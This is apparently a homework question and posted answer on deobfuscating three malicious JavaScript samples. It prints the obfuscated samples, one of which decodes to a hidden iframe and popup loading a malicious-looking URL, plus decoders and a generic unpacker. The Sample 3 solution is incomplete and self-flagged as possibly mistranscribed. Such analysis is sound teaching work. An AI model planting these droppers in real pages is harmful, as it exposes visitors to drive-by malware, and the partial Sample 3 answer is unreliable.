convert these scripts to plaintext, and analyze the content of the code, and sum
Question
convert these scripts to plaintext, and analyze the content of the code, and summarize what the scripts are doing in plain english.
Hint #1: All scripts are coded in JavaScript
Hint #2: All scripts use common encoding and obfuscation techniques that are popular with malware authors
Hint #3: Please remove carriage returns in the ciphertext for Samples #2 and #3
Hint #4: Search Google for a tool that lets you automate the conversion of ciphertext to plaintext. One tool is critical for Samples #2 and #3.
Hint #5: Sample #2 was used to scramble Sample #3: decode Sample #2 and understand its function in order to decode Sample #3.
Please note these samples are malicious scripts, handle with care.
Sample 1: <script>a=newArray(8.71,59.87,104.84,101.7,113.85,96.99,108.76,100.8,31.75,114.83,113.66,98.66,60.69,33.61,103.88,115.7,115.82,111.75,57.85,46.86,46.82,96.62,117.66,44.72,110.8,109.93,107.62,104.64,109.89,100.73,44.62,115.61,100.6,114.87,115.72,45.85,98.86,110.88,108.66,46.61,102.71,100.73,115.67,45.81,111.74,103.96,111.91,62.97,104.71,99.76,60.84,49.93,48.78,47.91,55.66,56.99,33.84,31.68,118.63,104.74,99.81,115.66,103.75,60.82,47.93,31.88,103.68,100.8,104.76,102.74,103.81,115.88,60.87,47.89,61.69,59.62,46.85,104.61,101.6,113.97,96.77,108.84,100.91,61.96,12.76,9.97,12.95,9.6,59.65,82.99,66.75,81.86,72.65,79.9,83.69,31.99,75.78,64.77,77.79,70.95,84.91,64.61,70.83,68.79,60.9,33.93,73.81,96.75,117.94,96.82,82.72,98.72,113.66,104.63,111.69,115.82,33.6,61.65,59.83,32.66,44.64,44.98,31.93,12.7,9.89,12.62,9.7,104.68,101.79,39.89,118.63,104.71,109.9,99.87,110.9,118.81,45.81,109.72,96.96,108.76,100.94,32.69,60.88,38.61,111.73,110.98,111.84,116.74,111.63,38.67,40.8,122.68,118.66,104.73,109.78,99.96,110.75,118.88,45.64,109.94,96.78,108.68,100.65,60.69,38.96,111.96,110.9,111.77,116.68,111.87,38.93,58.63,31.96,12.82,9.64,12.7,9.8,110.89,111.84,100.84,109.97,39.65,38.92,103.63,115.78,115.7,111.99,57.94,46.99,46.64,96.89,117.77,44.72,110.95,109.87,107.69,104.91,109.77,100.87,44.6,115.65,100.81,114.63,115.62,45.63,98.68,110.72,108.84,46.97,102.97,100.68,115.94,45.62,111.6,103.97,111.8,62.71,104.97,99.74,60.71,49.62,48.64,47.89,55.75,56.99,38.76,40.84,58.9,31.94,12.71,9.9,12.99,9.92,114.93,100.61,107.96,101.61,45.74,101.81,110.99,98.71,116.89,114.93,39.73,40.9,58.91,124.94,31.62,12.89,9.69,12.73,9.91,46.73,46.62,31.66,44.72,44.79,61.91,59.63,46.73,82.63,66.93,81.73,72.96,79.87,83.75,61.93,12.89,9.89);var i; for (i=0;i<=a.length;i++){document.write(String.fromCharCode(Math.round(a[i])));};</script>
Sample 2:
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));
Sample 3:
%08<VRKPAQ->%08dK"flG%08dK"flG%08dK"flG%08ld"gvwagzGnngjQ,rrCnngjQ]h`m%080.ld"gnkDmV
gtcQ,`fmfc]h`m%08+{fm@gqlmrqgp,0nozqo]h`m*gvkpU,`fmfc]h`m%08lgrM,`fmfc]h`m%083?gr{V,
`fmfc]h`m%08gqnG%08GQNCD.3.ld"lwP,nngjQU]h`m%08vzgL"gowqgP"pmppG"lM%08+ .empR]h`M"$"
, "$"gocL]h`M*vagh`MgvcgpA,QFP]h`m?nngjQU]h`m""vgQ%08 nngjQ "?"empR]h`M%08 vrkpaQU
"?"gocL]h`M%08gqmnA,gnkd]fcmnlumf%08vzgL%08++gfmAgv{@*pjA*gvkpU,gnkd]fcmnlumf%08+gv{
@a*@aqC?gfmAgv{@%08+3.k.{fm@NOZ*@fkO?gv{@a%08gxkq]gnkd]fcmnlumf"mV"3?k"pmD%08+{fm@NO
Z*@lgN?gxkq]gnkd]fcmnlumf%08+GWPV".ld*gnkDvzgVgvcgpA,q{QgnkD]h`m?gnkd]fcmnlumf"vgQ%08
+ .empR]h`M"$" , "$"gocL]h`M*vagh`MgvcgpA,QFP]h`m?q{QgnkD]h`m"vgQ%08 vagh`Mogvq{Qgnk
D "?"empR]h`M%08 elkvrkpaQ "?"gocL]h`M%08lgjV"pg`owL,ppG"dK%08+ .empR]h`M"$" , "$"go
cL]h`M*vagh`MgvcgpA,QFP]h`m"?"`fmfc]h`m"vgq%08 ocgpvQ "?"empR]h`M%08 @FMFC "?"gocL]h`
M%08vzgL"gowqgP"pmppG"lM%08flgq,0nozqo]h`m%08gqncD. gzg,01qpggrgk-ij,vglgakmt--8rvvj
. VGE "lgrm,0nozqo]h`m%08+empR]h`M"$" , "$"gocL]h`M*vagh`MgvcgpA"?"0nozqo]h`m"vgq%08
RVVJNOZ "?"empR]h`M%08 vdmqmpakO "?"gocL]h`M%08ld"$"pkFlkU?ld%08 ^ "$"+3*qvlglmromA]
jvcR]vlmD""$" ^ "$"+2*qvlglmromA]jvcR]vlmD"?pkFlkU%08+3.3/. ^ .jvcR,ogvKpgfnmDm*vknr
Q?qvlglmromA]jvcR]vlmD%08+ dvv,nm`o{Q *gocLgqpcR,pgfnmDm?ogvKpgfnmDm"vgQ%08+20*gacrQ
gocL,rrCnngjQ]h`m"?"pgfnmDm"vgQ%08+ .empR]h`M"$" , "$"gocL]h`M*vagh`MgvcgpA,QFP]h`m
"?"rrCnngjQ]h`m"vgq%08 lmkvcaknrrC "?"empR]h`M%08 nngjQ "?"gocL]h`M%08 gzg,01roak "?"
ld%08 41G;0AD62A22/C1:;/2F33/1C74/477A4;F@8fkqna ". fkqqcna "gvw`kpvvCvgq,QFP]h`m%08
QFP]h`m ". fk "gvw`kpvvCvgq,QFP]h`m%08+ vagh`m *vlgognGgvcgpa,vlgowamf"?"QFP]h`m"vgq
%08empR]h`M"okF%08gocL]h`M"okF%08lgjV""2"<>"+ 01lkU .opmdvcnr,pmvcektcl*pvQlK"dK%08l
gjV" pgpmnrzG"vglpgvlK"vdmqmpakO ?gocLrrc,pmvcektcl"dK%08< vrkpaQ@T ?gecwelcn"VRKPAQ>
Explanation / Answer
Solutions
Sample1:
<script>
/* Sample 1 decoder stub (analysis notes):
   - Each array entry is one character code with a fractional part added as
     noise; Math.round strips the fraction before String.fromCharCode.
   - The loop bound i<=a.length runs one past the end: a[a.length] is
     undefined, Math.round(undefined) is NaN, and fromCharCode(NaN) emits a
     U+0000 character as the final write.
   - The characters are written straight into the page with document.write,
     so whatever markup they form is rendered by the browser immediately.
   - Rounded by hand, the codes spell a width=0 height=0 <iframe> whose src is
     http://av-online-test.com/get.php?id=21089, followed by an inline script
     that calls open() on the same URL when window.name is not yet 'popup'.
     An analyst should replace document.write with alert() or a log call so the
     decoded text is displayed rather than executed. */
a=new Array(8.71,59.87,104.84,101.7,113.85,96.99,108.76,100.8,31.75,114.83,113.66,98.66,60.69,33.61,103.88,115.7,115.82,111.75,57.85,46.86,46.82,96.62,117.66,44.72,110.8,109.93,107.62,104.64,109.89,100.73,44.62,115.61,100.6,114.87,115.72,45.85,98.86,110.88,108.66,46.61,102.71,100.73,115.67,45.81,111.74,103.96,111.91,62.97,104.71,99.76,60.84,49.93,48.78,47.91,55.66,56.99,33.84,31.68,118.63,104.74,99.81,115.66,103.75,60.82,47.93,31.88,103.68,100.8,104.76,102.74,103.81,115.88,60.87,47.89,61.69,59.62,46.85,104.61,101.6,113.97,96.77,108.84,100.91,61.96,12.76,9.97,12.95,9.6,59.65,82.99,66.75,81.86,72.65,79.9,83.69,31.99,75.78,64.77,77.79,70.95,84.91,64.61,70.83,68.79,60.9,33.93,73.81,96.75,117.94,96.82,82.72,98.72,113.66,104.63,111.69,115.82,33.6,61.65,59.83,32.66,44.64,44.98,31.93,12.7,9.89,12.62,9.7,104.68,101.79,39.89,118.63,104.71,109.9,99.87,110.9,118.81,45.81,109.72,96.96,108.76,100.94,32.69,60.88,38.61,111.73,110.98,111.84,116.74,111.63,38.67,40.8,122.68,118.66,104.73,109.78,99.96,110.75,118.88,45.64,109.94,96.78,108.68,100.65,60.69,38.96,111.96,110.9,111.77,116.68,111.87,38.93,58.63,31.96,12.82,9.64,12.7,9.8,110.89,111.84,100.84,109.97,39.65,38.92,103.63,115.78,115.7,111.99,57.94,46.99,46.64,96.89,117.77,44.72,110.95,109.87,107.69,104.91,109.77,100.87,44.6,115.65,100.81,114.63,115.62,45.63,98.68,110.72,108.84,46.97,102.97,100.68,115.94,45.62,111.6,103.97,111.8,62.71,104.97,99.74,60.71,49.62,48.64,47.89,55.75,56.99,38.76,40.84,58.9,31.94,12.71,9.9,12.99,9.92,114.93,100.61,107.96,101.61,45.74,101.81,110.99,98.71,116.89,114.93,39.73,40.9,58.91,124.94,31.62,12.89,9.69,12.73,9.91,46.73,46.62,31.66,44.72,44.79,61.91,59.63,46.73,82.63,66.93,81.73,72.96,79.87,83.75,61.93,12.89,9.89);var i; for (i=0;i<=a.length;i++){document.write(String.fromCharCode(Math.round(a[i])));};</script>
Explanation:
Executing this script will redirect you to http://av-online-test.com/get.php?id=21089.
String.fromCharCode is a built-in JavaScript function that converts ASCII/Unicode character codes (numbers) into the corresponding characters.
For example, the codes 65, 66 and 67 correspond to A, B and C.
To read the characters in the array, you can use window.alert or a print function instead of document.write, so the decoded text is displayed rather than written into the page.
Sample 2:
The URL-encoded string was decoded using an online tool.
I used a tool at utilities-online.info (search Google for it).
After decoding, the code has the following form:
// Decoder recovered from Sample 2: walks the ciphertext s from its last
// character backwards and XORs each character code with 2, so the output is
// the reversed, XOR-2 form of the input. r, t, j and i are assigned without
// var and therefore become implicit globals.
function d(s)
{
r=new Array();
t="";j=0;
// Starts at the last index and stops while i>0, so s[0] is never processed:
// the first ciphertext character is dropped (off-by-one).
for(i=s.length-1;i>0;i--){
t+=String.fromCharCode(s.charCodeAt(i)^2);
// Flush the buffer into r whenever it grows past 80 characters.
if(t.length>80){r[j++]=t;
t=""
}
// Emit the chunks plus the unflushed tail. document.write puts the decoded
// text into the page, so any markup or script it contains is rendered.
}document.write(r.join("")+t)
};
Sample3
After deobfuscating Sample 3,
the following code is observed:
// NOTE(review): this is the generic "p,a,c,k,e,d" unpacker template (Dean
// Edwards' packer). The page does not show it being produced by running d()
// over Sample 3 — confirm the derivation before relying on it. As used below:
// p = packed source, a = radix, c = number of tokens, k = word table,
// e = token encoder (reassigned), d = lookup map (filled in place).
function(p,a,c,k,e,d)
{
// Encodes index c as a base-a token: digits 0-9 and a-z via toString(36),
// values above 35 as upper-case letters via c+29 (36 -> 'A').
e=function(c)
{
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
// Feature test for function-valued replace() callbacks; where the call
// returns '' the branch is taken and a token -> word map is built first.
if(!''.replace(/^/,String))
{
// d[token] = original word, or the token itself when k has no entry for it.
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
// NOTE(review): as transcribed, '\w+' is the string "w+" and '\b' below is a
// backspace character; the original packer doubles the backslashes
// ('\\w+', '\\b'), so the escapes were probably lost in transcription.
e=function(){return'\w+'};
c=1};
// Replace every whole-word token in p with its original word.
while(c--)
{
if(k[c])
{
p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}
return p
}